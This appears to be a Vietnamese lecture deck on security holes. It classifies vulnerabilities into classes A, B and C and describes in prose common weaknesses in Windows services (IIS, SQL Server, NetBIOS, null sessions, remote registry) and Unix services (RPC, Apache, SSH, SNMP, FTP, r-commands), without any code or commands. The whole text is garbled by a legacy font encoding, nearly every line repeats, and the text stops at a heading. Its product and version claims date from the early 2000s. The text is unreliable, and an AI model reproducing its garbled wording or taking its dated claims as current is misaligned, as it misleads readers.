Lç hæng b¶o mËtLç hæng b¶o mËt(Security Holes)(Security Holes)

PhÇn I: Mét sè vÊn ®Ò vÒ PhÇn I: Mét sè vÊn ®Ò vÒ lç hæng b¶o mËtlç hæng b¶o mËt

I.Kh i niÖm vÒ lç hæng b¶o mËtI.Kh i niÖm vÒ lç hæng b¶o mËt

Lç hæng b¶o mËt lµ nh÷ng ®iÓm yÕu trªn hÖ Lç hæng b¶o mËt lµ nh÷ng ®iÓm yÕu trªn hÖ

thèng hoÆc Èn chøa trong mét dÞch vô mµ dùa thèng hoÆc Èn chøa trong mét dÞch vô mµ dùa

vµo ®ã kÎ tÊn c«ng cã thÓ x©m nhËp tr i phÐp vµo ®ã kÎ tÊn c«ng cã thÓ x©m nhËp tr i phÐp

®Ó thùc hiÖn cc hµnh ®éng ph ho¹i hoÆc ®Ó thùc hiÖn cc hµnh ®éng ph ho¹i hoÆc

chiÕm ®o¹t tµi nguyªn bÊt hîp ph p.chiÕm ®o¹t tµi nguyªn bÊt hîp ph p.

II. Ph©n lo¹i læ hæng b¶o mËtII. Ph©n lo¹i læ hæng b¶o mËtLç hæng b¶o mËt ®­îc ph©n lµm 3 lo¹i c¬ b¶n:Lç hæng b¶o mËt ®­îc ph©n lµm 3 lo¹i c¬ b¶n:

- Lç hæng lo¹i A.- Lç hæng lo¹i A.

- Lç hæng lo¹i B.- Lç hæng lo¹i B.

- Lç hæng lo¹i C.- Lç hæng lo¹i C.

Lç hæng lo¹i C:Lç hæng lo¹i C: cc lç hæng lo¹i nµy cho phÐp cc thùc cc lç hæng lo¹i nµy cho phÐp cc thùc

hiÖn cc ph­¬ng thøc tÊn c«ng DoS. Møc ®é nguy hiÖn cc ph­¬ng thøc tÊn c«ng DoS. Møc ®é nguy

hiÓm thÊp, ChØ ¶nh h­ëng tíi chÊt l­îng dÞch vô, cã hiÓm thÊp, ChØ ¶nh h­ëng tíi chÊt l­îng dÞch vô, cã

thÓ lµm ng­ng trÖ gi¸n ®o¹n hÖ thèng, Kh«ng ph thÓ lµm ng­ng trÖ gi¸n ®o¹n hÖ thèng, Kh«ng ph

háng d÷ liÖu hoÆc ®¹t ®­îc quyÒn truy cËp bÊt hîp háng d÷ liÖu hoÆc ®¹t ®­îc quyÒn truy cËp bÊt hîp

ph p.ph p.

II. Ph©n lo¹i læ hæng b¶o mËtII. Ph©n lo¹i læ hæng b¶o mËt

- Lç hæng lo¹i B:Lç hæng lo¹i B: C c lç hæng lo¹i B cho phÐp ng­ C c lç hæng lo¹i B cho phÐp ng­

êi sö dông cã thªm cc quyÒn trªn hÖ thèng mµ êi sö dông cã thªm cc quyÒn trªn hÖ thèng mµ

kh«ng cÇn kiÓm tra tÝnh hîp lÖ nªn cã thÓ dÉn kh«ng cÇn kiÓm tra tÝnh hîp lÖ nªn cã thÓ dÉn

®Õn mÊt mt hoÆc lé th«ng tin yªu cÇu b¶o mËt ®Õn mÊt mt hoÆc lé th«ng tin yªu cÇu b¶o mËt

hÖ thèng.hÖ thèng.

- Lç hæng lo¹i A:Lç hæng lo¹i A: C c lç hæng nµy cho phÐp ng­êi C c lç hæng nµy cho phÐp ng­êi

sö dông ë ngoµi cã thÓ truy nhËp vµo hÖ thèng sö dông ë ngoµi cã thÓ truy nhËp vµo hÖ thèng

bÊt hîp ph p. Lç hæng nµy rÊt nguy hiÓm cã bÊt hîp ph p. Lç hæng nµy rÊt nguy hiÓm cã

thÓ ph vë toµn bé hÖ thèng.thÓ ph vë toµn bé hÖ thèng.

III. Mét sè lç hæng th­êng gÆp trong cc hÖ ®iÒu III. Mét sè lç hæng th­êng gÆp trong cc hÖ ®iÒu hµnhhµnh

1. HÖ ®iÒu hµnh Microsoft Windows1. HÖ ®iÒu hµnh Microsoft WindowsLçi trªn cc dÞch vô th«ng tin Internet (IIS Ð Internet Information Lçi trªn cc dÞch vô th«ng tin Internet (IIS Ð Internet Information

Service): Service):

IIS rÊt dÔ x¶y ra t×nh tr¹ng mÊt an toµn ë 3 líp chÝnh nh­ sau:IIS rÊt dÔ x¶y ra t×nh tr¹ng mÊt an toµn ë 3 líp chÝnh nh­ sau:Ð Lçi xö lý cc yªu cÇu kh«ng ®­îc dù kiÕn tr­ícLçi xö lý cc yªu cÇu kh«ng ®­îc dù kiÕn tr­íc (Fail to handle Unanticipated (Fail to handle Unanticipated

Requests):Requests): NhiÒu IIS rÊt dÔ bÞ tÊn c«ng do xö lý kh«ng ®óng cc yªu NhiÒu IIS rÊt dÔ bÞ tÊn c«ng do xö lý kh«ng ®óng cc yªu cÇu HTTP ®· ®­îc ®Þnh d¹ng. Lîi dông ®iÓm yÕu nµy, kÎ tÊn c«ng tõ xa cÇu HTTP ®· ®­îc ®Þnh d¹ng. Lîi dông ®iÓm yÕu nµy, kÎ tÊn c«ng tõ xa cã thÓ: Xem m· nguån cña cc kÞch b¶n øng dông, xem cc file bªn ngoµi cã thÓ: Xem m· nguån cña cc kÞch b¶n øng dông, xem cc file bªn ngoµi cña th­ môc web gèc, xem cc file web server ®· x©y dùng nh­ng kh«ng cña th­ môc web gèc, xem cc file web server ®· x©y dùng nh­ng kh«ng cung cÊp, thùc thi cc lÖnh tuú tiÖn trªn server.cung cÊp, thùc thi cc lÖnh tuú tiÖn trªn server.

Ð Lçi trµn bé ®Öm:Lçi trµn bé ®Öm: NhiÒu ISAPI më réng (ASP, PRINTER, SSHÉ ) rÊt dÔ NhiÒu ISAPI më réng (ASP, PRINTER, SSHÉ ) rÊt dÔ bÞ tÊn c«ng trµn vïng ®Öm. Nh÷ng tÊn c«ng trµn vïng ®Öm sÏ gióp cho kÎ bÞ tÊn c«ng trµn vïng ®Öm. Nh÷ng tÊn c«ng trµn vïng ®Öm sÏ gióp cho kÎ tÊn c«ng tõ xa ®¹t ®­îc nh÷ng môc ®Ých sau: Tõ chèi dÞch vô (DoS), tÊn c«ng tõ xa ®¹t ®­îc nh÷ng môc ®Ých sau: Tõ chèi dÞch vô (DoS), thùc thi cc m· hoÆc cc lÖnh bÊt kú trªn ng÷ c¶nh cña ng­êi dïng cña thùc thi cc m· hoÆc cc lÖnh bÊt kú trªn ng÷ c¶nh cña ng­êi dïng cña web server.web server.

Ð C c øng dông mÉu:C c øng dông mÉu: cc øng dông mÉu th­êng ®­îc thiÕt kÕ ®Ó gi¶i thÝch cc øng dông mÉu th­êng ®­îc thiÕt kÕ ®Ó gi¶i thÝch vai trß cña server nªn kh«ng cã kh¶ n ng chèng l¹i ®­îc cc tÊn c«ng vµ vai trß cña server nªn kh«ng cã kh¶ n ng chèng l¹i ®­îc cc tÊn c«ng vµ kh«ng cã dông ý phôc vô nh­ cc øng dông kh c. KÎ tÊn c«ng cã thÓ ghi kh«ng cã dông ý phôc vô nh­ cc øng dông kh c. KÎ tÊn c«ng cã thÓ ghi ®Ì cc file tuú ý trªn server, cã thÓ thu thËp cc th«ng tin vÒ c¬ së d÷ liÖu ®Ì cc file tuú ý trªn server, cã thÓ thu thËp cc th«ng tin vÒ c¬ së d÷ liÖu ng­êi dïng.ng­êi dïng.

C c thµnh phÇn truy nhËp d÷ liÖu Microsoft Ð C c dÞch C c thµnh phÇn truy nhËp d÷ liÖu Microsoft Ð C c dÞch vô d÷ liÖu tõ xa (Microsoft Data Access Components Ð vô d÷ liÖu tõ xa (Microsoft Data Access Components Ð Remote Data Services)Remote Data Services)

Ð Thµnh phÇn truy nhËp d÷ liÖu tõ xa (RDS) trong cc phiªn b¶n Thµnh phÇn truy nhËp d÷ liÖu tõ xa (RDS) trong cc phiªn b¶n

cò cña thµnh phÇn truy nhËp d÷ liÖu Microsoft (MDAC) cã mét cò cña thµnh phÇn truy nhËp d÷ liÖu Microsoft (MDAC) cã mét

ch­¬ng tr×nh bÞ sai sãt cho phÐp ng­êi dïng tõ xa cã thÓ thùc ch­¬ng tr×nh bÞ sai sãt cho phÐp ng­êi dïng tõ xa cã thÓ thùc

thi cc lÖnh côc bé víi ®Æc quyÒn cña ng­êi qu¶n trÞ.thi cc lÖnh côc bé víi ®Æc quyÒn cña ng­êi qu¶n trÞ.

Ð PhÇn lín cc hÖ ®iÒu hµnh Windows NT ch¹y IIS 3.0 hoÆc 4.0, PhÇn lín cc hÖ ®iÒu hµnh Windows NT ch¹y IIS 3.0 hoÆc 4.0,

Remote Data Service 1.5 vµ Visual Studio 6.0 ®Òu bÞ ¶nh h­Remote Data Service 1.5 vµ Visual Studio 6.0 ®Òu bÞ ¶nh h­

ëng bëi sai sãt nµyëng bëi sai sãt nµy

Microsoft SQL ServerMicrosoft SQL Server

Ð Microsoft SQL Server chøa mét sè ®iÓm yÕu nghiªm träng cho Microsoft SQL Server chøa mét sè ®iÓm yÕu nghiªm träng cho

phÐp kÎ tÊn c«ng tõ xa cã thÓ thu ®­îc nh÷ng th«ng tin mËt, söa phÐp kÎ tÊn c«ng tõ xa cã thÓ thu ®­îc nh÷ng th«ng tin mËt, söa

®æi néi dung c¬ së d÷ liÖu, lµm tæn th­¬ng ®Õn SQL Server, ®æi néi dung c¬ së d÷ liÖu, lµm tæn th­¬ng ®Õn SQL Server,

trong mét sè tr­êng hîp cã thÓ lµm tæn th­¬ng ®Õn my chñ trong mét sè tr­êng hîp cã thÓ lµm tæn th­¬ng ®Õn my chñ

Server.Server.

Ð BÊt kú hÖ thèng Windows nµo cµi ®Æt MS SQL Server 7.0 BÊt kú hÖ thèng Windows nµo cµi ®Æt MS SQL Server 7.0

hoÆc MS SQL Server 2000 hoÆc MS SQL Server Desktop hoÆc MS SQL Server 2000 hoÆc MS SQL Server Desktop

Engine 2000 ®Òu bÞ ¶nh h­ëng bëi ®iÓm yÕu nµy.Engine 2000 ®Òu bÞ ¶nh h­ëng bëi ®iÓm yÕu nµy.

NETBIOS Ð Unprotected Windows Networking sharesNETBIOS Ð Unprotected Windows Networking shares

Ð Microsoft Windows cung cÊp cho my chñ kh¶ n ng chia sÎ cc Microsoft Windows cung cÊp cho my chñ kh¶ n ng chia sÎ cc

file vµ th­ môc qua m¹ng víi c c my chñ kh c qua tiÖn Ých file vµ th­ môc qua m¹ng víi c c my chñ kh c qua tiÖn Ých

Windows Network Shares. MÆc dï ®©y lµ ®iÓm m¹nh vµ h÷u Windows Network Shares. MÆc dï ®©y lµ ®iÓm m¹nh vµ h÷u

Ých nh­ng nã l¹i ph« bµy cc file còng nh­ cung cÊp kü thuËt cho Ých nh­ng nã l¹i ph« bµy cc file còng nh­ cung cÊp kü thuËt cho

nh÷ng ng­êi dïng bÊt chÝnh cã thÓ lÊy quyÒn ®iÒu khiÓn hoµn nh÷ng ng­êi dïng bÊt chÝnh cã thÓ lÊy quyÒn ®iÒu khiÓn hoµn

toµn my chñ. Mét trong nh÷ng cch mµ virus Sircam vµ s©u toµn my chñ. Mét trong nh÷ng cch mµ virus Sircam vµ s©u

m¹ng Nimda l©y lan nhanh chãng vµo mïa hÌ 2001 lµ t×m ra m¹ng Nimda l©y lan nhanh chãng vµo mïa hÌ 2001 lµ t×m ra

nh÷ng tµi nguyªn m¹ng dïng chung kh«ng ®­îc b¶o vÖ vµ ®­a nh÷ng tµi nguyªn m¹ng dïng chung kh«ng ®­îc b¶o vÖ vµ ®­a

vµo ®ã mét b¶n sao cña chÝnh nã.vµo ®ã mét b¶n sao cña chÝnh nã.

Ð TÊt c¶ cc hÖ ®iÒu hµnh MS Windows ®Òu bÞ ¶nh h­ëng bëi TÊt c¶ cc hÖ ®iÒu hµnh MS Windows ®Òu bÞ ¶nh h­ëng bëi

®iÓm yÕu nµy.®iÓm yÕu nµy.

Anonymous Logon Ð Null SessionAnonymous Logon Ð Null Session

Ð KÕt nèi phiªn kh«ng hay ®¨ng nhËp nÆc danh lµ kü thuËt cho KÕt nèi phiªn kh«ng hay ®¨ng nhËp nÆc danh lµ kü thuËt cho

phÐp ng­êi dïng nÆc danh lÊy cc th«ng tin qua m¹ng (tªn ng­êi phÐp ng­êi dïng nÆc danh lÊy cc th«ng tin qua m¹ng (tªn ng­êi

dïng, cc tµi nguyªn dïng chung) hoÆc truy nhËp mµ kh«ng cÇn dïng, cc tµi nguyªn dïng chung) hoÆc truy nhËp mµ kh«ng cÇn

x c thùc. x c thùc.

Ð C c hÖ thèng Windows NT, XP vµ 2k ®Òu cã ®iÓm yÕu nµy.C c hÖ thèng Windows NT, XP vµ 2k ®Òu cã ®iÓm yÕu nµy.

X¸c thùc windows nãi chung Ð C c tµi kho¶n kh«ng mËt X¸c thùc windows nãi chung Ð C c tµi kho¶n kh«ng mËt khÈu hoÆc mËt khÈu yÕukhÈu hoÆc mËt khÈu yÕu

Ð MËt khÈu, cc m· an toµn th­êng ®­îc sö dông ®Ó t­¬ng t c gi÷a MËt khÈu, cc m· an toµn th­êng ®­îc sö dông ®Ó t­¬ng t c gi÷a

ng­êi dïng vµ hÖ thèng th«ng tin. PhÇn lín viÖc x c thùc ng­êi ng­êi dïng vµ hÖ thèng th«ng tin. PhÇn lín viÖc x c thùc ng­êi

dïng, b¶o vÖ file d÷ liÖu ®Òu yªu cÇu ng­êi dïng cung cÊp mËt dïng, b¶o vÖ file d÷ liÖu ®Òu yªu cÇu ng­êi dïng cung cÊp mËt

khÈu. V× nh÷ng truy nhËp x c thùc hîp lÖ kh«ng ®­îc ghi l¹i, khÈu. V× nh÷ng truy nhËp x c thùc hîp lÖ kh«ng ®­îc ghi l¹i,

thËm chÝ nÕu ®­îc ghi l¹i còng kh«ng bao giê g©y nghi ngê, nªn thËm chÝ nÕu ®­îc ghi l¹i còng kh«ng bao giê g©y nghi ngê, nªn

khi mËt khÈu bÞ lé sÏ lµ c¬ héi ®Ó ng­êi kh c kh m ph hÖ khi mËt khÈu bÞ lé sÏ lµ c¬ héi ®Ó ng­êi kh c kh m ph hÖ

thèng. Mét kÎ tÊn c«ng hoµn toµn cã thÓ truy nhËp ®Õn tµi thèng. Mét kÎ tÊn c«ng hoµn toµn cã thÓ truy nhËp ®Õn tµi

nguyªn cã s½n cña ng­êi dïng nµo ®ã vµ cã thÓ trùc tiÕp cho nguyªn cã s½n cña ng­êi dïng nµo ®ã vµ cã thÓ trùc tiÕp cho

phÐp cc kho¶n môc kh c cã thÓ truy nhËp ®Õn.phÐp cc kho¶n môc kh c cã thÓ truy nhËp ®Õn.

Ð BÊt cø hÖ thèng nµo mµ ng­êi dïng ®­îc x c thùc b»ng UserID BÊt cø hÖ thèng nµo mµ ng­êi dïng ®­îc x c thùc b»ng UserID

vµ Password ®Òu cã ®iÓm yÕu nµy.vµ Password ®Òu cã ®iÓm yÕu nµy.

Internet ExplorerInternet ExplorerÐ MS Internet Explorer lµ tr×nh duyÖt mÆc ®Þnh ®­îc cµi ®Æt MS Internet Explorer lµ tr×nh duyÖt mÆc ®Þnh ®­îc cµi ®Æt

trong cc hÖ ®iÒu hµnh MS Windows. TÊt c¶ cc phiªn b¶n hiÖn trong cc hÖ ®iÒu hµnh MS Windows. TÊt c¶ cc phiªn b¶n hiÖn

®ang tån t¹i ®Òu cã ®iÓm yÕu rÊt nguy hiÓm. §iÓm yÕu cã ®ang tån t¹i ®Òu cã ®iÓm yÕu rÊt nguy hiÓm. §iÓm yÕu cã

thÓ ®­îc lîi dông ®Ó ph¬i bµy cc Cookie, c c file hoÆc d÷ liÖu thÓ ®­îc lîi dông ®Ó ph¬i bµy cc Cookie, c c file hoÆc d÷ liÖu

riªng, thùc thi cc ch­¬ng tr×nh riªng, t¶i xuèng hoÆc thùc thi cc riªng, thùc thi cc ch­¬ng tr×nh riªng, t¶i xuèng hoÆc thùc thi cc

m· lÖnh bÊt kú hoÆc tiÕp qu¶n toµn bé hÖ thèng. m· lÖnh bÊt kú hoÆc tiÕp qu¶n toµn bé hÖ thèng.

Truy nhËp Registry tõ xa Ð (Remote Registry Truy nhËp Registry tõ xa Ð (Remote Registry

Access)Access)Ð Trong hÖ thèng Windows sö dông Registry, lµ mét c¬ së d÷ liÖu cã vÞ Trong hÖ thèng Windows sö dông Registry, lµ mét c¬ së d÷ liÖu cã vÞ

trÝ trung t©m ®Ó qu¶n lý phÇn mÒm, cÊu h×nh thiÕt bÞ vµ qu¶n lý ng­trÝ trung t©m ®Ó qu¶n lý phÇn mÒm, cÊu h×nh thiÕt bÞ vµ qu¶n lý ng­

êi dïng. C c thiÕt lËp an toµn vµ cc quyÒn hîp lÖ cã thÓ cho phÐp truy êi dïng. C c thiÕt lËp an toµn vµ cc quyÒn hîp lÖ cã thÓ cho phÐp truy

nhËp vµ Registry tõ xa. KÎ tÊn c«ng cã thÓ lîi dông ®Æc ®iÓm nµy ®Ó nhËp vµ Registry tõ xa. KÎ tÊn c«ng cã thÓ lîi dông ®Æc ®iÓm nµy ®Ó

lµm tæn th­¬ng hÖ thèng hoÆc thiÕt lËp cc cn cø ®Ó chØnh söa cc lµm tæn th­¬ng hÖ thèng hoÆc thiÕt lËp cc cn cø ®Ó chØnh söa cc

quyÒn vµ cc liªn kÕt file cho phÐp cc m· c ý. quyÒn vµ cc liªn kÕt file cho phÐp cc m· c ý.

Ð TÊt c¶ cc phiªn b¶n cña MS Windows ®Òu cã ®iÓm yÕu nµy.TÊt c¶ cc phiªn b¶n cña MS Windows ®Òu cã ®iÓm yÕu nµy.

2. Trªn hÖ ®iÒu hµnh Unix2. Trªn hÖ ®iÒu hµnh Unix

C c lêi gäi thñ tôc tõ xa (Remote Procedure Calls - RPC)C c lêi gäi thñ tôc tõ xa (Remote Procedure Calls - RPC)

Ð Lêi gäi thñ tôc tõ xa cho phÐp mét ch­¬ng tr×nh trªn mét my Lêi gäi thñ tôc tõ xa cho phÐp mét ch­¬ng tr×nh trªn mét my

tÝnh thùc thi cc thñ tôc trªn mét my tÝnh kh c b»ng cch göi d÷ tÝnh thùc thi cc thñ tôc trªn mét my tÝnh kh c b»ng cch göi d÷

liÖu ®i vµ nhËn d÷ liÖu vÒ. V× thÕ RPC ®­îc sö dông rÊt réng liÖu ®i vµ nhËn d÷ liÖu vÒ. V× thÕ RPC ®­îc sö dông rÊt réng

r·i trong nhiÒu dÞch vô m¹ng nh­ qu¶n trÞ tõ xa, chia sÎ file É r·i trong nhiÒu dÞch vô m¹ng nh­ qu¶n trÞ tõ xa, chia sÎ file É

Tuy nhiªn, cã rÊt nhiÒu sai sãt trong RPC ®Ó kÎ tÊn c«ng cã Tuy nhiªn, cã rÊt nhiÒu sai sãt trong RPC ®Ó kÎ tÊn c«ng cã

thÓ lîi dông. Trong nhiÒu tr­êng hîp, RPC ®­îc thùc hiÖn víi thÓ lîi dông. Trong nhiÒu tr­êng hîp, RPC ®­îc thùc hiÖn víi

®Æc quyÒn lµ root (quyÒn qu¶n trÞ), kÕt qu¶ lµ hÖ thèng xuÊt ®Æc quyÒn lµ root (quyÒn qu¶n trÞ), kÕt qu¶ lµ hÖ thèng xuÊt

hiÖn cc dÞch vô RPC dÔ bÞ nguy hiÓm cã thÓ cung cÊp cho hiÖn cc dÞch vô RPC dÔ bÞ nguy hiÓm cã thÓ cung cÊp cho

kÎ tÊn c«ng víi quyÒn quy cËp root tõ xa kh«ng x c thùc. kÎ tÊn c«ng víi quyÒn quy cËp root tõ xa kh«ng x c thùc.

Ð TÊt c¶ cc hÖ thèng Unix vµ Linux cã cµi ®Æt dÞch vô RPC TÊt c¶ cc hÖ thèng Unix vµ Linux cã cµi ®Æt dÞch vô RPC

®Òu bÞ ¶nh h­ëng cña ®iÓm yÕu nµy.®Òu bÞ ¶nh h­ëng cña ®iÓm yÕu nµy.

Apache ServerApache ServerÐ §©y lµ Web Server mÆc ®Þnh trong cc hÖ thèng Unix vµ §©y lµ Web Server mÆc ®Þnh trong cc hÖ thèng Unix vµ

Linux. Nh÷ng ng­êi qu¶n trÞ web cho r»ng Internet Information Linux. Nh÷ng ng­êi qu¶n trÞ web cho r»ng Internet Information

Server th­êng dÔ bÞ tæn th­¬ng nªn Apache Server hoµn toµn Server th­êng dÔ bÞ tæn th­¬ng nªn Apache Server hoµn toµn

an toµn. Trong khi so s nh víi IIS, mÆc dï Apache xøng ®¸ng víi an toµn. Trong khi so s nh víi IIS, mÆc dï Apache xøng ®¸ng víi

danh tiÕng an toµn, nh­ng nã vÉn kh«ng chøng tá ®­îc lµ kh«ng danh tiÕng an toµn, nh­ng nã vÉn kh«ng chøng tá ®­îc lµ kh«ng

thÓ bÞ tÊn c«ng d­íi sù xem xÐt kü l­ìng. thÓ bÞ tÊn c«ng d­íi sù xem xÐt kü l­ìng.

Ð GÇn nh­ tÊt c¶ cc hÖ thèng Unix vµ Linux ®Òu cã thÓ bÞ ¶nh GÇn nh­ tÊt c¶ cc hÖ thèng Unix vµ Linux ®Òu cã thÓ bÞ ¶nh

h­ëng bëi nh÷ng yÕu ®iÓm cña Apache.h­ëng bëi nh÷ng yÕu ®iÓm cña Apache.

SSH (Secure Shell)SSH (Secure Shell)Ð Shell an toµn lµ dÞch vô phæ biÕn cho viÖc ®¨ng nhËp an toµn, Shell an toµn lµ dÞch vô phæ biÕn cho viÖc ®¨ng nhËp an toµn,

thùc thi cc lÖnh vµ truyÒn nhËn file qua m¹ng. PhÇn lín cc hÖ thùc thi cc lÖnh vµ truyÒn nhËn file qua m¹ng. PhÇn lín cc hÖ

®iÒu hµnh Unix ®Òu sö dông gãi phÇn mÒm m· nguån më ®iÒu hµnh Unix ®Òu sö dông gãi phÇn mÒm m· nguån më

OpenSSH. MÆc dï SSH an toµn h¬n nhiÒu so víi Telnet vµ Ftp OpenSSH. MÆc dï SSH an toµn h¬n nhiÒu so víi Telnet vµ Ftp

nh­ng nhiÒu sai sãt vÉn ®­îc t×m thÊy trong khi thùc thi. PhÇn nh­ng nhiÒu sai sãt vÉn ®­îc t×m thÊy trong khi thùc thi. PhÇn

lín lµ cc lçi nhá vÒ an toµn nh­ng ®· ®­îc chØnh söa ngay lËp lín lµ cc lçi nhá vÒ an toµn nh­ng ®· ®­îc chØnh söa ngay lËp

tùc. §iÒu nguy hiÓm nhÊt trong viÖc lîi dông cc lç hæng nµy lµ tùc. §iÒu nguy hiÓm nhÊt trong viÖc lîi dông cc lç hæng nµy lµ

nã cho phÐp mét kÎ tÊn c«ng cã thÓ cã ®­îc quyÒn truy nhËp nã cho phÐp mét kÎ tÊn c«ng cã thÓ cã ®­îc quyÒn truy nhËp

root trªn mét my tõ xa.root trªn mét my tõ xa.

Ð TÊt c¶ cc hÖ ®iÒu hµnh Unix hoÆc Linux cµi ®Æt cc phiªn TÊt c¶ cc hÖ ®iÒu hµnh Unix hoÆc Linux cµi ®Æt cc phiªn

b¶n OpenSHH 3.3 hoÆc cò h¬n ®Òu chÞu ¶nh h­ëng cña b¶n OpenSHH 3.3 hoÆc cò h¬n ®Òu chÞu ¶nh h­ëng cña

®iÓm yÕu nµy.®iÓm yÕu nµy.

Giao thøc qu¶n lý m¹ng ®¬n gi¶n (Giao thøc qu¶n lý m¹ng ®¬n gi¶n (Simple Simple

Network Management Protocol -SNMP)Network Management Protocol -SNMP)Ð Giao thøc nµy ®­îc sö dông réng r·i ®Ó gi¸m s t tõ xa vµ cÊu Giao thøc nµy ®­îc sö dông réng r·i ®Ó gi¸m s t tõ xa vµ cÊu

h×nh hÇu nh­ tÊt c¶ cc thiÕt bÞ hiÖn ®¹i cho phÐp giao thøc h×nh hÇu nh­ tÊt c¶ cc thiÕt bÞ hiÖn ®¹i cho phÐp giao thøc

TCP/IP. SNMP th­êng ®­îc sö dông lµ ph­¬ng ph p ®Ó cÊu TCP/IP. SNMP th­êng ®­îc sö dông lµ ph­¬ng ph p ®Ó cÊu

h×nh vµ qu¶n lý cc thiÕt bÞ nh­ my in, router, chuyÓn m¹ch, h×nh vµ qu¶n lý cc thiÕt bÞ nh­ my in, router, chuyÓn m¹ch,

É , vµ cung cÊp d÷ liÖu vµo cho cc dÞch vô gi¸m s t m¹ng. É , vµ cung cÊp d÷ liÖu vµo cho cc dÞch vô gi¸m s t m¹ng.

Ð Sù truyÒn th«ng SNMP bao gåm viÖc trao ®æi cc lo¹i th«ng Sù truyÒn th«ng SNMP bao gåm viÖc trao ®æi cc lo¹i th«ng

bo kh c nhau gi÷a cc tr¹m qu¶n lý SNMP vµ cc vµ nh÷ng thiÕt b o kh c nhau gi÷a cc tr¹m qu¶n lý SNMP vµ cc vµ nh÷ng thiÕt

bÞ m¹ng. C ch thøc sö dông cc th«ng bo nµy vµ kü thuËt x c bÞ m¹ng. C ch thøc sö dông cc th«ng bo nµy vµ kü thuËt x c

thùc trªn cc th«ng bo nµy ®Òu cã ®iÓm yÕu ®Ó cã thÓ khai thùc trªn cc th«ng bo nµy ®Òu cã ®iÓm yÕu ®Ó cã thÓ khai

th c mét cch ®¸ng kÓ ®Ó kÎ tÊn c«ng cã thÓ lîi dông ®Ó cÊu th c mét cch ®¸ng kÓ ®Ó kÎ tÊn c«ng cã thÓ lîi dông ®Ó cÊu

h×nh l¹i hoÆc t¾t cc thiÕt bÞ tõ xa. ViÖc truyÒn th«ng SNMP h×nh l¹i hoÆc t¾t cc thiÕt bÞ tõ xa. ViÖc truyÒn th«ng SNMP

®­îc coi lµ sù béc lé sè l­îng lín cc cÊu tróc m¹ng còng nh­ cc ®­îc coi lµ sù béc lé sè l­îng lín cc cÊu tróc m¹ng còng nh­ cc

thiÕt bÞ vµ hÖ thèng g¾n vµo nã. KÎ x©m nhËp sö dông cc thiÕt bÞ vµ hÖ thèng g¾n vµo nã. KÎ x©m nhËp sö dông cc

th«ng tin nµy ®Ó lùa chän môc ®Ých vµ lËp kÕ ho¹ch tÊn c«ng.th«ng tin nµy ®Ó lùa chän môc ®Ých vµ lËp kÕ ho¹ch tÊn c«ng.

DÞch vô truyÒn file DÞch vô truyÒn file (File Transfer Protocol (File Transfer Protocol

-FTP)-FTP) Ð FTP lµ dÞch vô dïng ®Ó ph©n phèi cc file cho cc ng­êi dïng FTP lµ dÞch vô dïng ®Ó ph©n phèi cc file cho cc ng­êi dïng

nÆc danh hoÆc ®­îc x c thùc (b»ng username vµ password). nÆc danh hoÆc ®­îc x c thùc (b»ng username vµ password).

Ng­êi dïng nÆc danh kh«ng cÇn cung cÊp mËt khÈu truy nhËp Ng­êi dïng nÆc danh kh«ng cÇn cung cÊp mËt khÈu truy nhËp

cho nªn tÊt c¶ cc ng­êi dïng ®Òu cã thÓ sö dông cïng mét tªn cho nªn tÊt c¶ cc ng­êi dïng ®Òu cã thÓ sö dông cïng mét tªn

®Ó ®¨ng nhËp (anonymous hoÆc ftp). C c dÞch vô Ftp yªu cÇu ®Ó ®¨ng nhËp (anonymous hoÆc ftp). C c dÞch vô Ftp yªu cÇu

x c thùc cÇnph¶i cung cÊp username vµ password nh­ng nã l¹i x c thùc cÇnph¶i cung cÊp username vµ password nh­ng nã l¹i

truyÒn ®i d­íi d¹ng râ nªn rÊt dÔ bÞ lé trªn ®­êng truyÒn. NhiÒu truyÒn ®i d­íi d¹ng râ nªn rÊt dÔ bÞ lé trªn ®­êng truyÒn. NhiÒu

sai sãt nguy hiÓm ®· ®­îc t×m ra trong dÞch vô nµy gióp cho kÎ sai sãt nguy hiÓm ®· ®­îc t×m ra trong dÞch vô nµy gióp cho kÎ

tÊn c«ng cã thÓ giµnh ®­îc quyÒn truy nhËp root ®Ó truy nhËp tÊn c«ng cã thÓ giµnh ®­îc quyÒn truy nhËp root ®Ó truy nhËp

vµ khai t c my chñ Ftp Server.vµ khai t c my chñ Ftp Server.

DÞch vô R- Quan hÖ tin t­ëng (R-services Ð Trust DÞch vô R- Quan hÖ tin t­ëng (R-services Ð Trust

Relationships)Relationships) Ð Shell tõ xa (rsh), copy tõ xa (rcp), login tõ xa (rlogin) vµ thùc thi Shell tõ xa (rsh), copy tõ xa (rcp), login tõ xa (rlogin) vµ thùc thi

tõ xa (rexec) lµ cc lÖnh R (R-commands) ®­îc sö dông rÊt réng tõ xa (rexec) lµ cc lÖnh R (R-commands) ®­îc sö dông rÊt réng

r·i trong thÕ giíi Unix. C c tæ chøc sö dông nhiÒu my chñ Unix r·i trong thÕ giíi Unix. C c tæ chøc sö dông nhiÒu my chñ Unix

®Òu sö dông dÞch vô R ®Ó cho phÐp cc user cã thÓ chuyÓn ®Òu sö dông dÞch vô R ®Ó cho phÐp cc user cã thÓ chuyÓn

tõ my nµy sang my kh c mµ kh«ng cÇn ph¶i nhËp l¹i username tõ my nµy sang my kh c mµ kh«ng cÇn ph¶i nhËp l¹i username

vµ password mét lÇn n÷a. Khi quan hÖ tin cËy kh«ng ®­îc thiÕt vµ password mét lÇn n÷a. Khi quan hÖ tin cËy kh«ng ®­îc thiÕt

lËp th× ng­êi dïng muèn ®¨ng nhËp ®Õn my kh c b¾t buéc lËp th× ng­êi dïng muèn ®¨ng nhËp ®Õn my kh c b¾t buéc

ph¶i göi username vµ password qua m¹ng do ®ã rÊt dÔ bÞ ph¶i göi username vµ password qua m¹ng do ®ã rÊt dÔ bÞ

®¸nh c¾p v× chóng ®­îc truyÒn ®i d­íi d¹ng râ. Khi quan hÖ tin ®¸nh c¾p v× chóng ®­îc truyÒn ®i d­íi d¹ng râ. Khi quan hÖ tin

cËy ®­îc thiÕt lËp th× kÎ tÊn c«ng cã thÓ gi¶ danh mét ng­êi cËy ®­îc thiÕt lËp th× kÎ tÊn c«ng cã thÓ gi¶ danh mét ng­êi

dïng hîp lÖ trªn mét my chñ hîp lÖ ®Ó truy nhËp vµ khai th c tµi dïng hîp lÖ trªn mét my chñ hîp lÖ ®Ó truy nhËp vµ khai th c tµi

nguyªn trªn tÊt c¶ cc my kh c. nguyªn trªn tÊt c¶ cc my kh c.

DÞch vô in Ên (Line Printer Daemon)DÞch vô in Ên (Line Printer Daemon)

